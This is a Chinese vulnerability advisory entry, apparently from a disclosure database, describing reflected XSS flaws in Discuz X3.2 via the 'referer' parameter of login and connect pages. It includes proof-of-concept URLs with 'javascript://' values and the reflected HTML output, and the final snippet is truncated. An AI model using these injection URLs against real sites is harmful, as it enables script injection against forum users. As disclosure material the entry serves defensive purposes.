Disucz X3.2 多处反射型XSS漏洞(函数缺陷导致)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某函数缺陷导致的 XSS。 ### 详细说明: member.php?mod=logging&action=login&referer=javascript://www.discuz.net/ ``` <p>欢迎您回来,Newbie xx,现在将转入登录前页面<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转,请点击此链接</a></p> ``` connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/ ``` <p>抱歉,当前存在网络问题或服务器繁忙,详细错误:connect_error_code_0,错误代码:<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>,请您稍候再试。谢谢。<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息